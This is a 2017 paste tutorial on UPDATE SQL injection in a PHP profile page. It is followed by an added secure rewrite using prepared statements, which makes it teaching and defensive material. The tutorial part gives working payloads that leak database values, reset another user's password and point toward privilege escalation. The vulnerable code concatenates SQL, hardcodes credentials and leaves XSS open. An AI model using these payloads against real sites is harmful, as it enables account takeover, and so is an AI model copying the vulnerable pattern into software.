
Untitled

a guest
Nov 27th, 2017
Hey, I am going to show you a little about UPDATE SQL injections.

This occurs sometimes, for example in profile pages.
The SQL statement is not secure, because there are no filter mechanisms active
and I have not used PDO or similar.

This is mostly exploited as a blind SQL injection; I show you how to get output anyway.
And far more interesting ;)

The interesting line from the source code is the following:

if($_POST["submit"]) {
 mysql_query("UPDATE users SET user_name='".$_POST['user_name']."', user_password='".$_POST['user_password']."', user_realname='".$_POST['user_realname']."', user_website='".$_POST['user_website']."' where id=".$id) or die(mysql_error());
 echo "<b> Your Profile was successfully updated!</b><br>\n";
}

The code tells the query to put the input directly into the database, which is a very dangerous behaviour.


I have 2 prepared users:
id 1 jon doe
id 2 maria doe

______________________________________________________

You can tell by simply checking the following payload:
1' OR 1='1

This is a good indicator that the form is vulnerable,
let's look at the source.


The input forms have very interesting names; you could just try to overwrite a column by doing the following:
(the requirement is that the column names you are trying to overwrite actually exist!)

', user_website=(select 123), user_realname='1

What you actually do is escape from the column set, and then set your own by using a direct MySQL subquery
(select 123)
and then use user_realname to close your query with correct syntax.


This tells the query to insert YOUR statement inside of the query.

You actually just use your own statement. You can now print everything you want to, for example:
', user_website=(select version()), user_realname='1

You have direct output from the database, but there is more.
You can UPDATE values like the passwords of other users:

', user_password='mynewchangedpassword' where id=2#

This will change the password owned by another user (id 2).
In this example, other values get overwritten too, because all data is overwritten in the example profile page update.


Let's check Maria's profile password.
As you can see, we have overwritten Maria's profile values.
You can also raise your privileges when there is, for example, an admin flag like
admin=1 or rights=1/2/3/4.

This is a cheap tutorial. Source code will be added.
This is a presentation by frank, fuck you all !

<?php

// id comes straight from the URL, defaulting to 1
$id = ($_GET['id'] ? $_GET['id'] : 1);
mysql_connect("localhost", "stream", "hurensohn") or die(mysql_error());
mysql_select_db("stream") or die(mysql_error());

if($_POST["submit"]) {
 // every POST field (and $id) is concatenated straight into the SQL string: this is the injection point
 mysql_query("UPDATE users SET user_name='".$_POST['user_name']."', user_password='".$_POST['user_password']."', user_realname='".$_POST['user_realname']."', user_website='".$_POST['user_website']."' where id=".$id) or die(mysql_error());
 echo "<b> Your Profile was successfully updated!</b><br>\n";
}

// the SELECT uses intval() on the id, the UPDATE above does not
$query = mysql_query("SELECT * from users where id=".intval($id));
$array = mysql_fetch_array($query);
?>
<h1>Edit your profile:</h1><br>
<FORM method="POST">
<LABEL for="user">Username: </LABEL>
        <INPUT autocomplete="off" type="text" name="user_name" value="<?php echo $array['user_name'] ?>"><BR>
<LABEL for="real">Real Name: </LABEL>
        <INPUT autocomplete="off" type="text" name="user_realname" value="<?php echo $array['user_realname'] ?>"><BR>
<LABEL for="password">Password: </LABEL>
        <INPUT autocomplete="off" type="text" name="user_password" value="<?php echo $array['user_password'] ?>"><BR>
<LABEL for="website">Website: </LABEL>
        <INPUT autocomplete="off" type="text" name="user_website" value="<?php echo $array['user_website'] ?>"><BR>
<INPUT type="submit" value="Send" name="submit">
</FORM>
<?php
// database values are echoed into the HTML unescaped
echo "Data:<br>\n";
echo "<label id=\"user_id\"><b>ID:       ".$array['id']."</b><br></label>\n";
echo "<label id=\"user_name\"><b>Username: ".$array['user_name']."</b><br></label>\n";
echo "<label id=\"user_realname\"><b>Realname: ".$array['user_realname']."</b><br></label>\n";
echo "<label id=\"user_website\"><b>Website : ".$array['user_website']."</b><br></label>\n";
// you can have your cheap xss here :>
?>
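For comparison, here is the same profile page written so that none of the payloads above change the query. This is an added example, not the code of the paste's author: it uses PDO prepared statements (the mysql_* extension used above was removed in PHP 7.0), takes the row id from the session instead of ?id=, and escapes everything echoed into HTML. The database credentials, the $_SESSION['user_id'] key and the width of the user_password column are assumptions.

```php
<?php
// Added example, not the original author's code: the same profile-update
// page rewritten so that user input never becomes part of the SQL text.
// Assumptions: the user id comes from the session, DB credentials are
// placeholders, and users.user_password is wide enough for a password_hash().
declare(strict_types=1);

session_start();

// The original page took ?id= from the URL, so the UPDATE could be pointed at
// any row. Here the row is chosen by the logged-in user (assumed to be stored
// in $_SESSION['user_id'] by a login page that is not shown).
$id = (int) ($_SESSION['user_id'] ?? 0);
if ($id <= 0) {
    http_response_code(403);
    exit('Not logged in');
}

$pdo = new PDO(
    'mysql:host=localhost;dbname=stream;charset=utf8mb4',
    'stream',
    'DB_PASSWORD_PLACEHOLDER',
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // values are sent separately from the query text
    ]
);

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['submit'])) {
    // The column list is fixed in the query; the values travel as bound
    // parameters, so a payload like ', user_website=(select 123), ... is
    // stored as a plain string and can neither add columns nor change the WHERE.
    $stmt = $pdo->prepare(
        'UPDATE users SET user_name = :name, user_realname = :realname,
                          user_website = :website WHERE id = :id'
    );
    $stmt->execute([
        ':name'     => (string) ($_POST['user_name'] ?? ''),
        ':realname' => (string) ($_POST['user_realname'] ?? ''),
        ':website'  => (string) ($_POST['user_website'] ?? ''),
        ':id'       => $id,
    ]);

    // Password handled on its own: only changed when a new one is supplied,
    // and stored as a hash instead of the clear-text value the original kept.
    $newPassword = (string) ($_POST['user_password'] ?? '');
    if ($newPassword !== '') {
        $pw = $pdo->prepare('UPDATE users SET user_password = :hash WHERE id = :id');
        $pw->execute([
            ':hash' => password_hash($newPassword, PASSWORD_DEFAULT),
            ':id'   => $id,
        ]);
    }
    echo "<b>Your profile was successfully updated!</b><br>\n";
}

// Read back only what the page displays; the password hash is never echoed.
$stmt = $pdo->prepare('SELECT id, user_name, user_realname, user_website FROM users WHERE id = :id');
$stmt->execute([':id' => $id]);
$row = $stmt->fetch(PDO::FETCH_ASSOC) ?: [];

// Escape everything that goes into HTML, which also removes the "cheap xss"
// the original page jokes about at the end.
function h(?string $s): string
{
    return htmlspecialchars($s ?? '', ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
?>
<h1>Edit your profile:</h1>
<form method="POST">
  <label for="user_name">Username:</label>
  <input autocomplete="off" type="text" id="user_name" name="user_name" value="<?= h($row['user_name'] ?? null) ?>"><br>
  <label for="user_realname">Real Name:</label>
  <input autocomplete="off" type="text" id="user_realname" name="user_realname" value="<?= h($row['user_realname'] ?? null) ?>"><br>
  <label for="user_password">New password (leave empty to keep):</label>
  <input autocomplete="off" type="password" id="user_password" name="user_password" value=""><br>
  <label for="user_website">Website:</label>
  <input autocomplete="off" type="text" id="user_website" name="user_website" value="<?= h($row['user_website'] ?? null) ?>"><br>
  <input type="submit" value="Send" name="submit">
</form>
<p>Data:<br>
  <b>ID: <?= h((string) ($row['id'] ?? '')) ?></b><br>
  <b>Username: <?= h($row['user_name'] ?? null) ?></b><br>
  <b>Realname: <?= h($row['user_realname'] ?? null) ?></b><br>
  <b>Website: <?= h($row['user_website'] ?? null) ?></b>
</p>
```

Two things to check when reviewing a page like the original: whether any request parameter (here the POST fields and ?id=) is concatenated into the SQL text, and whether the row being updated is selected by something the client controls. Prepared statements fix the first; binding the WHERE clause to the authenticated user's id fixes the second, which is what stops the password change against id 2 shown above.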